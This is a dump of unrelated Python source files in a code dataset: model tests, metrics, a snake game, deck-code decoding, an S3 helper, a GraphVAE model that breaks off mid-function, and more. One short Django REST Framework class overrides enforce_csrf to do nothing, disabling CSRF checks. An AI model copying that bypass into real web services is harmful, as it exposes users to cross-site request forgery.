id
stringlengths 3
8
| content
stringlengths 100
981k
|
|---|---|
455663
|
from math import sin, cos
import pytest
import numpy as np
from .._esn_online import ESNOnline
from reservoirpy.datasets import lorenz
@pytest.fixture(scope="session")
def matrices():
Win = np.array([[1, -1],
[-1, 1],
[1, -1],
[-1, -1]])
W = np.array([[0.0, 0.1, -0.1, 0.0],
[0.2, 0.0, 0.0, -0.2],
[0.0, 0.2, 0.3, 0.1],
[-0.1, 0.0, 0.0, 0.0]])
Wout = np.zeros((2, 4 + 1))
return W, Win, Wout
@pytest.fixture(scope="session")
def matrices_fb():
Win = np.array([[1, -1],
[-1, 1],
[1, -1],
[-1, -1]])
W = np.array([[0.0, 0.1, -0.1, 0.0],
[0.2, 0.0, 0.0, -0.2],
[0.0, 0.2, 0.3, 0.1],
[-0.1, 0.0, 0.0, 0.0]])
Wfb = np.array([[1, -1],
[-1, -1],
[1, 1],
[-1, 1]])
Wout = np.zeros((2, 4 + 1))
return W, Win, Wout, Wfb
@pytest.fixture(scope="session")
def dummy_data():
Xn0 = np.array([[sin(x), cos(x)] for x in np.linspace(0, 4*np.pi, 500)])
Xn1 = np.array([[sin(x), cos(x)]
for x in np.linspace(np.pi/4, 4*np.pi+np.pi/4, 500)])
return Xn0, Xn1
def test_esn(matrices, dummy_data):
W, Win, Wout = matrices
esn = ESNOnline(lr=0.1, W=W, Win=Win, dim_out=2, input_bias=False)
X, y = dummy_data
states = esn.train([X], [y])
assert esn.Wout.shape == (2, 5)
outputs, states = esn.run([X])
assert states[0].shape[0] == X.shape[0]
assert outputs[0].shape[1] == y.shape[1]
states = esn.train([X, X, X], [y, y, y])
assert esn.Wout.shape == (2, 5)
outputs, states = esn.run([X, X])
assert len(states) == 2
assert len(outputs) == 2
def test_esn_fb(matrices_fb, dummy_data):
W, Win, Wout, Wfb = matrices_fb
esn = ESNOnline(lr=0.1, W=W, Win=Win, Wfb=Wfb,
dim_out=2, input_bias=False,
fbfunc=np.tanh)
X, y = dummy_data
states = esn.train([X], [y])
assert esn.Wout.shape == (2, 5)
outputs, states = esn.run([X])
assert states[0].shape[0] == X.shape[0]
assert outputs[0].shape[1] == y.shape[1]
states = esn.train([X, X, X], [y, y, y])
assert esn.Wout.shape == (2, 5)
outputs, states = esn.run([X, X])
assert len(states) == 2
assert len(outputs) == 2
|
455687
|
from skimage.transform import resize
heatmap_1_r = resize(heatmap_1, (50,80), mode='reflect',
preserve_range=True, anti_aliasing=True)
heatmap_2_r = resize(heatmap_2, (50,80), mode='reflect',
preserve_range=True, anti_aliasing=True)
heatmap_3_r = resize(heatmap_3, (50,80), mode='reflect',
preserve_range=True, anti_aliasing=True)
heatmap_geom_avg = np.power(heatmap_1_r * heatmap_2_r * heatmap_3_r, 0.333)
display_img_and_heatmap("dog.jpg", heatmap_geom_avg)
|
455698
|
import logging
import boto3
from botocore.exceptions import ClientError
def download_file(dest_bucket_name, dest_file_key):
"""Fetch an file to an Amazon S3 bucket
The src_data argument must be of type bytes or a string that references
a file specification.
:param dest_bucket_name: string
:param dest_file_key: string
:return: download path if get the file successfully, otherwise
False
"""
# get the file
s3 = boto3.client('s3')
download_path = '/tmp/{}'.format(dest_file_key)
try:
s3.download_file(dest_bucket_name, dest_file_key, download_path)
except ClientError as e:
# AllAccessDisabled error == bucket not found
# NoSuchKey or InvalidRequest error == (dest bucket/obj == src bucket/obj)
logging.error(e)
return False
return download_path
|
455699
|
import os
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), "../../"))
import tensorflow as tf
import magenta.models.melody_rnn.melody_rnn_create_dataset as md
import scripts.target as tgt
def main(unused_argv):
tf.logging.set_verbosity(md.FLAGS.log)
config = md.melody_rnn_config_flags.config_from_flags()
pipeline_instance = md.get_pipeline(config, md.FLAGS.eval_ratio)
md.pipeline.run_pipeline_serial(
pipeline_instance,
md.pipeline.tf_record_iterator(tgt.SEQUENCE_FILE, pipeline_instance.input_type),
tgt.OUTPUT_DIR)
def console_entry_point():
tf.app.run(main)
if __name__ == "__main__":
console_entry_point()
|
455711
|
from rest_framework.authentication import SessionAuthentication
class CsrfExemptSessionAuthentication(SessionAuthentication):
def enforce_csrf(self, request):
return
|
455725
|
import json
import os
import pickle
import ulmo
import param
import pandas as pd
import geopandas as gpd
from shapely.geometry import box, Point
from quest import util
reserved_catalog_entry_fields = [
'name',
'service',
'service_id',
'publisher_id',
'display_name',
'description',
'reserved',
'geometry',
'parameters',
]
reserved_geometry_fields = [
'latitude',
'longitude',
'geom_type',
'latitudes',
'longitudes',
'bbox',
]
reserved_catalog_entry_fields.extend(reserved_geometry_fields)
class ServiceBase(param.Parameterized): # TODO can I make this an abc and have it be a Paramitarized?
"""Base class for data providers
"""
service_name = None
display_name = None
description = None
service_type = None
unmapped_parameters_available = None
geom_type = None
datatype = None
geographical_areas = None
bounding_boxes = None
_parameter_map = None
# name = param.String(default='Service', precedence=-1)
def __init__(self, provider, **kwargs):
self.provider = provider
super(ServiceBase, self).__init__(**kwargs)
@property
def title(self):
return '{} Download Options'.format(self.display_name)
@property
def use_cache(self):
return self.provider.use_cache
@property
def metadata(self):
return {
'display_name': self.display_name,
'description': self.description,
'service_type': self.service_type,
'parameters': list(self._parameter_map.values()),
'unmapped_parameters_available': self.unmapped_parameters_available,
'geom_type': self.geom_type,
'datatype': self.datatype,
'geographical_areas': self.geographical_areas,
'bounding_boxes': self.bounding_boxes
}
@property
def parameters(self):
return {
'parameters': list(self._parameter_map.values()),
'parameter_codes': list(self._parameter_map.keys())
}
@property
def parameter_code(self):
if hasattr(self, 'parameter'):
pmap = self.parameter_map(invert=True)
return pmap[self.parameter]
def parameter_map(self, invert=False):
pmap = self._parameter_map
if pmap is None:
raise NotImplementedError()
if invert:
pmap = {v: k for k, v in pmap.items()}
return pmap
def get_parameters(self, catalog_ids=None):
"""Default function that should be overridden if the catalog_ids argument needs to be handled."""
return self.parameters
def get_download_options(self, fmt):
"""
needs to return dictionary
eg. {'path': /path/to/dir/or/file, 'format': 'raster'}
"""
if fmt == 'param':
schema = self
elif fmt == 'json':
schema = util.format_json_options(self)
else:
raise ValueError('{} is an unrecognized format.'.format(fmt))
return schema
def download(self, catalog_id, file_path, dataset, **kwargs):
raise NotImplementedError()
def search_catalog_wrapper(self, update_cache=False, **kwargs):
"""Get catalog_entries associated with service.
Take a series of query parameters and return a list of
locations as a geojson python dictionary
"""
cache_file = os.path.join(util.get_cache_dir(self.provider.name), self.name + '_catalog.p')
if self.use_cache and not update_cache:
try:
catalog_entries = pd.read_pickle(cache_file)
self._label_catalog_entries(catalog_entries)
# convert to GeoPandas GeoDataFrame
catalog_entries = gpd.GeoDataFrame(catalog_entries, geometry='geometry')
return catalog_entries
except Exception as e:
util.logger.info(e)
util.logger.info('updating cache')
catalog_entries = self.search_catalog(**kwargs)
# convert geometry into shapely objects
if 'bbox' in catalog_entries.columns:
catalog_entries['geometry'] = catalog_entries['bbox'].apply(lambda row: box(*[float(x) for x in row]))
del catalog_entries['bbox']
if {'latitude', 'longitude'}.issubset(catalog_entries.columns):
def fn(row):
return Point((
float(row['longitude']),
float(row['latitude'])
))
catalog_entries['geometry'] = catalog_entries.apply(fn, axis=1)
del catalog_entries['latitude']
del catalog_entries['longitude']
if {'geom_type', 'latitudes', 'logitudes'}.issubset(catalog_entries.columns):
# TODO handle this case or remove from reserved fields and docs
pass
# del catalog_entries['geom_type']
# del catalog_entries['latitude']
# del catalog_entries['longitude']
if 'geometry' in catalog_entries.columns:
pass
# The following line doesn't have any effect (except perhaps to validate the geometry)
# catalog_entries['geometry'].apply(shape)
if 'geometry' not in catalog_entries.columns:
catalog_entries['geometry'] = None
# add defaults values
if 'display_name' not in catalog_entries.columns:
catalog_entries['display_name'] = catalog_entries.index
if 'description' not in catalog_entries.columns:
catalog_entries['description'] = ''
# merge extra data columns/fields into metadata as a dictionary
extra_fields = list(set(catalog_entries.columns.tolist()) - set(reserved_catalog_entry_fields))
# change NaN to None so it can be JSON serialized properly
catalog_entries['metadata'] = json.loads(catalog_entries[extra_fields].to_json(orient='records'))
catalog_entries.drop(extra_fields, axis=1, inplace=True)
columns = list(set(catalog_entries.columns.tolist()).intersection(reserved_geometry_fields))
catalog_entries.drop(columns, axis=1, inplace=True)
params = self.get_parameters(catalog_ids=catalog_entries)
if isinstance(params, pd.DataFrame):
groups = params.groupby('service_id').groups
catalog_entries['parameters'] = catalog_entries.index.map(
lambda x: ','.join(filter(None, params.loc[groups[x]]['parameter'].tolist()))
if x in groups.keys() else ''
)
else:
catalog_entries['parameters'] = ','.join(params['parameters'])
if self.use_cache:
# write to cache_file
os.makedirs(os.path.split(cache_file)[0], exist_ok=True)
catalog_entries.to_pickle(cache_file)
self._label_catalog_entries(catalog_entries)
# convert to GeoPandas GeoDataFrame
catalog_entries = gpd.GeoDataFrame(catalog_entries, geometry='geometry')
return catalog_entries
def _label_catalog_entries(self, catalog_entries):
catalog_entries['service'] = util.construct_service_uri(self.provider.name, self.name)
if 'service_id' not in catalog_entries:
catalog_entries['service_id'] = catalog_entries.index
catalog_entries['service_id'] = catalog_entries['service_id'].apply(str)
catalog_entries.index = catalog_entries['service'] + '/' + catalog_entries['service_id']
catalog_entries['name'] = catalog_entries.index
def search_catalog(self, **kwargs):
"""
should return a pandas dataframe or a python dictionary with
indexed by catalog_entry uid and containing the following columns
reserved column/field names
display_name -> will be set to uid if not provided
description -> will be set to '' if not provided
download_url -> optional download url
defining geometry options:
1) geometry -> geojson string or shapely object
2) latitude & longitude columns/fields
3) geometry_type, latitudes, longitudes columns/fields
4) bbox column/field -> tuple with order (lon min, lat min, lon max, lat max)
all other columns/fields will be accumulated in a dict and placed
in a metadata field.
:param **kwargs:
"""
raise NotImplementedError()
def get_tags(self, update_cache=False):
cache_file = os.path.join(util.get_cache_dir(self.provider.name), self.name + '_tags.p')
if self.use_cache and not update_cache:
try:
with open(cache_file, 'rb') as cache:
tags = pickle.load(cache)
return tags
except:
util.logger.info('updating tag cache')
catalog_entries = self.search_catalog_wrapper(update_cache=update_cache)
metadata = pd.DataFrame(list(catalog_entries.metadata))
# drop metadata fields that are unusable as tag fields
metadata.drop(labels=['location', 'coverages'], axis=1, inplace=True, errors='ignore')
tags = {}
for tag in metadata.columns:
try:
tags[tag] = list(metadata[tag].unique())
# make sure datetime values are serialized (for RPC server)
tags[tag] = json.loads(json.dumps(tags[tag], default=util.to_json_default_handler))
except TypeError:
values = list(metadata[tag])
new_tags = dict()
new_tags[tag] = list()
for v in values:
if isinstance(v, dict):
self._combine_dicts(new_tags, self._get_tags_from_dict(tag, v))
else:
new_tags[tag].append(v)
if not new_tags[tag]:
del new_tags[tag]
tags.update({k: list(set(v)) for k, v in new_tags.items()})
if self.use_cache:
# write to cache_file
with open(cache_file, 'wb') as cache:
pickle.dump(tags, cache)
return tags
def _get_tags_from_dict(self, tag, d):
"""Helper function for `get_tags` to recursively parse dicts and add them as multi-indexed tags
"""
tags = dict()
for k, v in d.items():
new_tag = '{}:{}'.format(tag, k)
if isinstance(v, dict):
self._combine_dicts(tags, self._get_tags_from_dict(new_tag, v))
else:
tags[new_tag] = v
return tags
def _combine_dicts(self, this, other):
"""Helper function for `get_tags` to combine dictionaries by aggregating values rather than overwriting them.
"""
for k, other_v in other.items():
other_v = util.listify(other_v)
if k in this:
this_v = this[k]
if isinstance(this_v, list):
other_v.extend(this_v)
else:
other_v.append(this_v)
this[k] = other_v
class TimePeriodServiceBase(ServiceBase):
start = param.Date(default=None, precedence=2, doc='start date')
end = param.Date(default=None, precedence=3, doc='end date')
@property
def start_string(self):
return self.start.strftime('%Y-%m-%d')
@property
def end_string(self):
return self.end.strftime('%Y-%m-%d')
# abc
class SingleFileServiceBase(ServiceBase):
"""Base file for datasets that are a single file download
eg elevation raster etc
"""
def download(self, catalog_id, file_path, dataset, **kwargs):
service_uri = util.construct_service_uri(self.provider.name, self.name, catalog_id)
catalog_id = self.provider.search_catalog(self.name).loc[service_uri]
reserved = catalog_id.get('reserved')
download_url = reserved['download_url']
fmt = reserved.get('extract_from_zip', '')
filename = reserved.get('filename', util.uuid('dataset'))
file_path = self._download_file(file_path, download_url, fmt, filename)
return {
'file_path': file_path,
'file_format': reserved.get('file_format'),
'parameter': catalog_id.get('parameters'),
'datatype': self.datatype,
}
def _download_file(self, path, url, tile_fmt, filename, check_modified=False):
os.makedirs(path, exist_ok=True)
os.makedirs(os.path.join(path, 'zip'), exist_ok=True)
tile_path = os.path.join(path, filename)
util.logger.info('... downloading %s' % url)
if tile_fmt == '':
ulmo.util.download_if_new(url, tile_path, check_modified=check_modified)
else:
zip_path = os.path.join(path, 'zip', filename)
ulmo.util.download_if_new(url, zip_path, check_modified=check_modified)
util.logger.info('... ... zipfile saved at %s' % zip_path)
tile_path = ulmo.util.extract_from_zip(zip_path, tile_path, tile_fmt)
return tile_path
|
455756
|
import game_config
from game_config import Position
import copy
class Snake(object):
def __init__(self) -> None:
self.window_size = Position(game_config.game_sizes["width"], game_config.game_sizes["height"])
self.direction = game_config.D_Down
self.body = []
self.last_body = []
for i in range(3):
self.body.append(Position(2, 3 - i))
def reset(self) -> None:
self.direction = game_config.D_Down
self.body = []
self.last_body = []
for i in range(3):
self.body.append(Position(2, 3 - i))
def get_dis_inc_factor(self) -> Position:
dis_increment_factor = Position(0, 0)
# 修改每个方向上的速度
if self.direction == game_config.D_Up:
dis_increment_factor.y = -1
elif self.direction == game_config.D_Down:
dis_increment_factor.y = 1
elif self.direction == game_config.D_Left:
dis_increment_factor.x = -1
elif self.direction == game_config.D_Right:
dis_increment_factor.x = 1
return dis_increment_factor
def update_snake_pos(self) -> None:
dis_increment_factor = self.get_dis_inc_factor()
self.last_body = copy.deepcopy(self.body)
for index, item in enumerate(self.body):
if index < 1:
item.x += dis_increment_factor.x
item.y += dis_increment_factor.y
else: # 剩下的部分要跟着前一部分走
item.x = self.last_body[index - 1].x
item.y = self.last_body[index - 1].y
def check_alive(self) -> bool: # 检查是否死亡
flag1 = self.check_eat_self()
flag2 = self.check_hit_wall()
return not (flag1 or flag2)
def eat_food(self, food) -> None:
self.body.append(self.last_body[-1]) # 长大一个元素
def check_eat_food(self, foods: list) -> int: # 返回吃到了哪个食物
for index, food in enumerate(foods):
if food == self.body[0]:
self.eat_food(food)
foods.pop(index)
return index
return -1
def check_eat_self(self) -> bool:
return self.body[0] in self.body[1:] # 判断蛇头是不是和身体重合
def check_hit_wall(self) -> bool:
is_between_top_bottom = self.window_size.y - 1 > self.body[0].y > 0
is_between_left_right = self.window_size.x - 1 > self.body[0].x > 0
return not (is_between_top_bottom and is_between_left_right)
def is_valid_position(self, pos: Position) -> bool:
# 我想过用这个函数替换检查吃自己和撞墙,但我认为也许单独写一个也许会更好一点
flag1 = not (pos in self.body)
flag2 = self.window_size.y - 1 > pos.y > 0 and \
self.window_size.x - 1 > pos.x > 0
return flag1 and flag2
def get_relative_direction(self, pos1: Position, pos2: Position) -> int:
# 返回 pos1 在 pos2 的上(下左右)边
# 默认两个点是在一行(列)上的
x_inc = pos1.x - pos2.x
y_inc = pos1.y - pos2.y
if 0 != x_inc and 0 != y_inc:
raise ValueError
if x_inc > 0:
return game_config.D_Right
elif x_inc < 0:
return game_config.D_Left
elif y_inc > 0:
return game_config.D_Down
elif y_inc < 0:
return game_config.D_Up
raise ValueError
|
455773
|
from io import BytesIO
from typing import List
from lor_deckcodes.utils import next_varint, decode_base32
from lor_deckcodes.constants import faction_mapping, CURRENT_FORMAT_VERSION, SUPPORTED_VERSIONS
def _decode_card_block(n: int, data_stream: BytesIO) -> List[str]:
card_block_list = []
n_card_copies = next_varint(data_stream)
for copies in range(n_card_copies):
n_cards = next_varint(data_stream)
set_number = next_varint(data_stream)
faction = next_varint(data_stream)
for card in range(n_cards):
card_block_list.append(f'{n}:{set_number:02}{faction_mapping.get(faction)}{next_varint(data_stream):03}')
return card_block_list
def _decode_event_card_block(data_stream: BytesIO) -> List[str]:
n_card_copies = next_varint(data_stream)
set_number = next_varint(data_stream)
faction = next_varint(data_stream)
num = next_varint(data_stream)
return [f'{n_card_copies}:{set_number:02}{faction_mapping.get(faction)}{num:03}']
def decode_deck(deckcode: str):
all_cards = []
decoded = decode_base32(deckcode)
data = BytesIO(decoded)
if next_varint(data) not in SUPPORTED_VERSIONS:
raise ValueError("Version/Format not supported.")
# 3 card copies
all_cards.extend(_decode_card_block(3, data))
# 2 card copies
all_cards.extend(_decode_card_block(2, data))
# 1 card copies
all_cards.extend(_decode_card_block(1, data))
# 4+ card copies (Events only)
while True:
try:
all_cards.extend(_decode_event_card_block(data))
except EOFError:
break
return all_cards
|
455804
|
import os, subprocess, sys, getopt
from subprocess import run
def find_cppcheck():
drive_letters = ['C', 'D']
for drive_letter in drive_letters:
cppcheck_path = drive_letter + r":\Program Files\Cppcheck\cppcheck.exe"
if os.path.isfile(cppcheck_path):
return cppcheck_path
print('Failed to find cppcheck.exe')
sys.exit(1)
def lint(cppcheck_path, report_path, ignore_path):
args = [
cppcheck_path,
'--enable=all',
'--platform=win64',
'--template={callstack}: ({severity}) {message}',
'--inconclusive',
'-q',
'--project=LambdaEngine.sln',
'--project-configuration=Release|x64'
]
if ignore_path:
args.append(f'-i{ignore_path}')
thread_count = min(os.cpu_count(), 8)
if thread_count:
print(f'Using {thread_count} threads')
args.append(f'-j {thread_count}')
# Use stdout as the report
with open(report_path, 'w') as report:
print('Linting... ', flush=True, end='')
# Ignore stdout
FNULL = open(os.devnull, 'w')
subprocess.run(args, stdout=FNULL, stderr=report)
print('Finished', flush=True)
report.close()
def main(argv):
report_path = None
ignore_path = None
helpStr = '''usage: generate-lint-report.py -o <path> -i <dir>\n
-o: path in which to store lint report\n
-i: file or directory to ignore when linting. Wildcards are allowed, eg: \'-i src/*\''''
try:
opts, args = getopt.getopt(argv, "hi:o:", ["help"])
except getopt.GetoptError:
print("Intended usage:")
print(helpStr)
print(f"Used flags: {str(args)}")
sys.exit(1)
for opt, arg in opts:
if opt == "-h":
print(helpStr)
sys.exit(1)
elif opt == "-o":
report_path = arg
elif opt == "-i":
ignore_path = arg
if not report_path:
print(helpStr)
sys.exit(1)
cppcheck_path = find_cppcheck()
lint(cppcheck_path, report_path, ignore_path)
sys.exit(0)
if __name__ == "__main__":
main(sys.argv[1:])
|
455835
|
r"""Assorted function for use when computing metrics and evals."""
import collections
import os
import numpy as np
import scipy
from scipy import signal
from scipy.ndimage.filters import convolve
import tensorflow.compat.v1 as tf
def _FSpecialGauss(size, sigma):
"""Function to mimic the 'fspecial' gaussian MATLAB function."""
radius = size // 2
offset = 0.0
start, stop = -radius, radius + 1
if size % 2 == 0:
offset = 0.5
stop -= 1
x, y = np.mgrid[offset + start:stop, offset + start:stop]
assert len(x) == size
g = np.exp(-((x**2 + y**2)/(2.0 * sigma**2)))
return g / g.sum()
def fspecial_gauss(size, sigma):
"""Function to mimic the 'fspecial' gaussian MATLAB function."""
radius = size // 2
offset = 0.0
start, stop = -radius, radius + 1
if size % 2 == 0:
offset = 0.5
stop -= 1
x, y = np.mgrid[offset + start:stop, offset + start:stop]
assert len(x) == size
g = np.exp(-((x**2 + y**2)/(2.0 * sigma**2)))
return g / g.sum()
def ssim(img1, img2, max_val=255, filter_size=11,
filter_sigma=1.5, k1=0.01, k2=0.03, mask=None):
"""Original code here: https://github.com/tensorflow/models/blob/f87a58cd96d45de73c9a8330a06b2ab56749a7fa/research/compression/image_encoder/msssim.py
Return the Structural Similarity Map between `img1` and `img2`.
This function attempts to match the functionality of ssim_index_new.m by
<NAME>: http://www.cns.nyu.edu/~lcv/ssim/msssim.zip
Arguments:
img1: Numpy array holding the first RGB image batch.
img2: Numpy array holding the second RGB image batch.
max_val: the dynamic range of the images (i.e., the difference between the
maximum the and minimum allowed values).
filter_size: Size of blur kernel to use (will be reduced for small images).
filter_sigma: Standard deviation for Gaussian blur kernel (will be reduced
for small images).
k1: Constant used to maintain stability in the SSIM calculation (0.01 in
the original paper).
k2: Constant used to maintain stability in the SSIM calculation (0.03 in
the original paper).
Returns:
Pair containing the mean SSIM and contrast sensitivity between `img1` and
`img2`.
Raises:
RuntimeError: If input images don't have the same shape or don't have four
dimensions: [batch_size, height, width, depth].
"""
if img1.shape != img2.shape:
raise RuntimeError("Input images must have the same shape (%s vs. %s).",
img1.shape, img2.shape)
if img1.ndim == 3:
img1 = np.expand_dims(img1, 0)
if img2.ndim == 3:
img2 = np.expand_dims(img2, 0)
if img1.ndim != 4:
raise RuntimeError(
"Input images must have four dimensions, not %d", img1.ndim)
img1 = img1.astype(np.float64)
img2 = img2.astype(np.float64)
_, height, width, _ = img1.shape
# Filter size can't be larger than height or width of images.
size = min(filter_size, height, width)
# Scale down sigma if a smaller filter size is used.
sigma = size * filter_sigma / filter_size if filter_size else 0
if filter_size:
window = np.reshape(fspecial_gauss(size, sigma), (1, size, size, 1))
mu1 = signal.fftconvolve(img1, window, mode="same")
mu2 = signal.fftconvolve(img2, window, mode="same")
sigma11 = signal.fftconvolve(img1 * img1, window, mode="same")
sigma22 = signal.fftconvolve(img2 * img2, window, mode="same")
sigma12 = signal.fftconvolve(img1 * img2, window, mode="same")
else:
# Empty blur kernel so no need to convolve.
mu1, mu2 = img1, img2
sigma11 = img1 * img1
sigma22 = img2 * img2
sigma12 = img1 * img2
mu11 = mu1 * mu1
mu22 = mu2 * mu2
mu12 = mu1 * mu2
sigma11 -= mu11
sigma22 -= mu22
sigma12 -= mu12
# Calculate intermediate values used by both ssim and cs_map.
c1 = (k1 * max_val) ** 2
c2 = (k2 * max_val) ** 2
v1 = 2.0 * sigma12 + c2
v2 = sigma11 + sigma22 + c2
if mask is not None:
score = (((2.0 * mu12 + c1) * v1) / ((mu11 + mu22 + c1) * v2))
score = np.sum(mask * score) / (np.sum(mask*np.ones_like(score)))
else:
score = np.mean((((2.0 * mu12 + c1) * v1) / ((mu11 + mu22 + c1) * v2)))
# cs = np.mean(v1 / v2)
return score
def load_lpips():
"""Return a function to compute the LPIPS distance between two images.
Returns:
distance: a function that takes two images [H, W, C] scaled from 0 to 1, and
returns the LPIPS distance between them.
"""
graph = tf.compat.v1.Graph()
session = tf.compat.v1.Session(graph=graph)
with graph.as_default():
input1 = tf.compat.v1.placeholder(tf.float32, [None, None, 3])
input2 = tf.compat.v1.placeholder(tf.float32, [None, None, 3])
with tf.gfile.Open('alex_net.pb', 'rb') as f:
graph_def = tf.GraphDef()
graph_def.ParseFromString(f.read())
# Required order for network is [B, C, H, W].
target = tf.transpose((input1[tf.newaxis] * 2.0) - 1.0, [0, 3, 1, 2])
pred = tf.transpose((input2[tf.newaxis] * 2.0) - 1.0, [0, 3, 1, 2])
tf.import_graph_def(
graph_def, input_map={'0:0':target, '1:0':pred})
distance = graph.get_operations()[-1].outputs[0]
def lpips_distance(img1, img2):
with graph.as_default():
return session.run(distance, {input1:img1, input2:img2})[0, 0, 0, 0]
return lpips_distance
|
455875
|
from sys import platform
import sys
try:
import caffe
except ImportError:
print("This sample can only be run if Python Caffe if available on your system")
print("Currently OpenPose does not compile Python Caffe. This may be supported in the future")
sys.exit(-1)
import os
os.environ["GLOG_minloglevel"] = "1"
import caffe
import cv2
import numpy as np
import sys
import time
dir_path = os.path.dirname(os.path.realpath(__file__))
sys.path.append('../../python')
dir_path + "/../../models/"
try:
from openpose import OpenPose
except:
raise Exception('Error: OpenPose library could not be found. Did you enable `BUILD_PYTHON` in CMake and have this Python script in the right folder?')
# Params for change
defRes = 736
scales = [1,0.5]
class Param:
caffemodel = dir_path + "/../../../models/pose/body_25/pose_iter_584000.caffemodel"
prototxt = dir_path + "/../../../models/pose/body_25/pose_deploy.prototxt"
# Load OpenPose object and Caffe Nets
params = dict()
params["logging_level"] = 3
params["output_resolution"] = "-1x-1"
params["net_resolution"] = "-1x"+str(defRes)
params["model_pose"] = "BODY_25"
params["alpha_pose"] = 0.6
params["scale_gap"] = 0.5
params["scale_number"] = len(scales)
params["render_threshold"] = 0.05
params["num_gpu_start"] = 0
params["disable_blending"] = False
params["default_model_folder"] = dir_path + "/../../../models/"
openpose = OpenPose(params)
caffe.set_mode_gpu()
caffe.set_device(0)
nets = []
for scale in scales:
nets.append(caffe.Net(Param.prototxt, Param.caffemodel, caffe.TEST))
print("Net loaded")
# Test Function
first_run = True
def func(frame):
# Get image processed for network, and scaled image
imagesForNet, imagesOrig = OpenPose.process_frames(frame, defRes, scales)
# Reshape
global first_run
if first_run:
for i in range(0, len(scales)):
net = nets[i]
imageForNet = imagesForNet[i]
in_shape = net.blobs['image'].data.shape
in_shape = (1, 3, imageForNet.shape[1], imageForNet.shape[2])
net.blobs['image'].reshape(*in_shape)
net.reshape()
first_run = False
print("Reshaped")
# Forward pass to get heatmaps
heatmaps = []
for i in range(0, len(scales)):
net = nets[i]
imageForNet = imagesForNet[i]
net.blobs['image'].data[0,:,:,:] = imageForNet
net.forward()
heatmaps.append(net.blobs['net_output'].data[:,:,:,:])
# Pose from HM Test
array, frame = openpose.poseFromHM(frame, heatmaps, scales)
# Draw Heatmaps instead
#hm = heatmaps[0][:,0:18,:,:]; frame = OpenPose.draw_all(imagesOrig[0], hm, -1, 1, True)
#paf = heatmaps[0][:,20:,:,:]; frame = OpenPose.draw_all(imagesOrig[0], paf, -1, 4, False)
return frame
img = cv2.imread(dir_path + "/../../../examples/media/COCO_val2014_000000000192.jpg")
frame = func(img)
while 1:
cv2.imshow("output", frame)
cv2.waitKey(15)
|
455907
|
from InstruccionesPL.TablaSimbolosPL.InstruccionPL import InstruccionPL
from InstruccionesPL.IndicesPL import IndicePL1, IndicePL7, IndicePL8, IndicePL9, IndicePLUnique, IndicePLUsing, IndicePLUsingNull
from InstruccionesPL.Expresiones import PrimitivoPL
class AlterIndice(InstruccionPL):
def __init__(self, nombre, columnaActual, columnaNueva, tipo, linea, columna, strGram ):
InstruccionPL.__init__(self, tipo, linea, columna, strGram)
self.nombre = nombre
self.columnaActual = columnaActual
self.columnaNueva =columnaNueva
def ejecutar(self, tabla, arbol):
super().ejecutar(tabla, arbol)
arbol.modificarIndice(self.nombre, self.columnaActual, self.columnaNueva)
def traducir(self, tabla, arbol):
super().traducir(tabla, arbol)
|
455913
|
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.distributions as D
from base import BaseModel
EPSILON = 1e-30
class GraphVAE(BaseModel):
def __init__(self, input_dim, n_nodes, node_dim):
super(GraphVAE, self).__init__()
# store parameters
self.input_dim = input_dim
self.n_nodes = n_nodes
self.node_dim = node_dim
# encoder: x -> h_x
self.encoder = nn.Sequential(
nn.Linear(input_dim, 512),
nn.BatchNorm1d(512),
nn.ELU(),
nn.Linear(512, 512),
nn.BatchNorm1d(512),
nn.ELU(),
nn.Linear(512, 256),
nn.BatchNorm1d(256),
nn.ELU(),
nn.Linear(256, 128)
)
# bottom-up inference: predicts parameters of P(z_i | x)
self.bottom_up = nn.ModuleList([
nn.Sequential(
nn.Linear(128, 128),
nn.BatchNorm1d(128),
nn.ELU(),
nn.Linear(128, node_dim),
nn.Linear(node_dim, 2*node_dim) # split into mu and logvar
)
for _ in range(n_nodes-1)]) # ignore z_n
# top-down inference: predicts parameters of P(z_i | Pa(z_i))
self.top_down = nn.ModuleList([
nn.Sequential(
nn.Linear((n_nodes - i - 1)*node_dim, 128), # parents of z_i are z_{i+1} ... z_N
nn.BatchNorm1d(128),
nn.ELU(),
nn.Linear(128, node_dim),
nn.Linear(node_dim, 2*node_dim) # split into mu and logvar
)
for i in range(n_nodes-1)]) # ignore z_n
# decoder: (z_1, z_2 ... z_n) -> parameters of P(x)
self.decoder = nn.Sequential(
nn.Linear(node_dim*n_nodes, 256),
nn.BatchNorm1d(256),
nn.ELU(),
nn.Linear(256, 512),
nn.BatchNorm1d(512),
nn.ELU(),
nn.Linear(512, 512),
nn.BatchNorm1d(512),
nn.ELU(),
nn.Linear(512, input_dim)
)
# mean of Bernoulli variables c_{i,j} representing edges
self.gating_params = nn.ParameterList([
nn.Parameter(torch.empty(n_nodes - i - 1, 1, 1).fill_(0.5), requires_grad=True)
for i in range(n_nodes-1)]) # ignore z_n
# distributions for sampling
self.unit_normal = D.Normal(torch.zeros(self.node_dim), torch.ones(self.node_dim))
self.gumbel = D.Gumbel(0., 1.)
# other parameters / distributions
self.tau = 1.0
def forward(self, x):
# x: (batch_size, input_size)
hx = self.encoder(x)
# sample z_n from N(0, I)
z_n = self.unit_normal.sample([x.size(0)]).to(x.device)
parents = [z_n]
mu_z = [torch.zeros(x.size(0), self.node_dim).to(x.device)]
sigma_z = [torch.ones(x.size(0), self.node_dim).to(x.device)]
for i in reversed(range(self.n_nodes-1)):
self.gating_params[i].data = self.gating_params[i].data.clamp(0., 1.)
# compute gating constants c_{i,j}
mu = self.gating_params[i]
eps1, eps2 = self.gumbel.sample(mu.size()).to(x.device), self.gumbel.sample(mu.size()).to(x.device)
num = torch.exp((eps2 - eps1)/self.tau)
t1 = torch.pow(mu, 1./self.tau)
t2 = torch.pow((1.-mu), 1./self.tau)*num
c = t1 / (t1 + t2 + EPSILON)
if torch.isnan(t1).any() or torch.isnan(t2).any() or torch.isnan(c).any() or torch.isnan(mu).any():
print(t1,t2,c,mu)
# find concatenated parent vector
parent_vector = (c * torch.stack(parents)).permute(1,0,2).reshape(x.size(0), -1)
# top-down inference
td = self.top_down[i](parent_vector)
mu_td, sigma_td = td[:, :self.node_dim], F.softplus(td[:, self.node_dim:])
# bottom-up inference
bu = self.bottom_up[i](hx)
mu_bu, sigma_bu = bu[:, :self.node_dim], F.softplus(bu[:, self.node_dim:])
# precision weighted fusion
mu_zi = (mu_td * sigma_bu**2 + mu_bu * sigma_td**2) / (sigma_td**2 + sigma_bu**2 + EPSILON)
